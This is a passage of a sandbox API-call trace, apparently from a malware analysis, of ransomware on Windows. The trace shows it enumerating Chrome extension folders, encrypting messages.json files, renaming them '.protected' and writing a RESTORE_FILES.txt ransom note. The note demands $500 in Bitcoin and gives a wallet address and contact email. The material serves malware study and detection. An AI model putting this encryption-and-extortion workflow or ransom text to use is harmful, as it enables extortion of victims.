hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0084.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0084.004] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json") returned 164 [0084.004] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0084.004] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json") returned 164 [0084.004] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0084.004] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json") returned 164 [0084.004] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0084.004] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.006] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.006] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.006] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.006] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.006] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.006] CloseHandle (hObject=0x168) returned 1 [0084.006] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.protected") returned 174 [0084.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.protected")) returned 1 [0084.007] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.007] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\RESTORE_FILES.txt") returned 168 [0084.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.007] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.007] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.008] lstrlenA (lpString="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") returned 684 [0084.008] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.008] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.008] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.008] CloseHandle (hObject=0x164) returned 1 [0084.008] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.008] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0084.008] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0084.008] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0084.008] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0084.008] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0084.008] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk") returned 150 [0084.008] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0084.008] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0084.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\*") returned 152 [0084.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0084.009] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.009] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.009] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.009] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.009] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\.") returned 152 [0084.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.009] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.009] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.009] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.009] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.009] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.009] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\..") returned 153 [0084.009] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.009] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.009] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.009] lstrcmpiW (lpString1="messages.json", 
lpString2="Windows") returned -1 [0084.009] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0084.009] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0084.009] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0084.009] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0084.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json") returned 164 [0084.009] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0084.009] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.009] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0084.009] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0084.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0084.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json") returned 164 [0084.010] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0084.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json") returned 164 [0084.010] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0084.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json") returned 164 [0084.010] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0084.010] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.012] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.012] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.012] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.012] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.012] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.012] CloseHandle (hObject=0x168) returned 1 [0084.012] wnsprintfW (in: 
pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.protected") returned 174 [0084.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.protected")) returned 1 [0084.013] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.013] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.013] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\RESTORE_FILES.txt") returned 168 [0084.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.013] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.013] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.014] lstrlenA 
(lpString="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") returned 684 [0084.014] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.014] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.014] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.014] CloseHandle (hObject=0x164) returned 1 [0084.014] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.014] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0084.014] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0084.014] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0084.014] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0084.014] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0084.014] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi") returned 150 [0084.014] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0084.015] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0084.015] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\*") returned 152 [0084.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0084.015] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.015] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.015] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.015] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.015] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.015] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\.") returned 152 [0084.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.015] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.015] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.015] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.015] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.015] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.015] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.015] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\..") returned 153 [0084.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.015] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.015] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.015] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0084.015] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0084.015] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0084.015] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0084.015] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0084.015] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json") returned 164 [0084.015] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0084.015] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.015] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0084.016] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0084.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0084.016] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json") returned 164 [0084.016] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0084.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json") returned 164 [0084.016] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0084.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json") returned 164 [0084.016] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0084.016] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.018] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 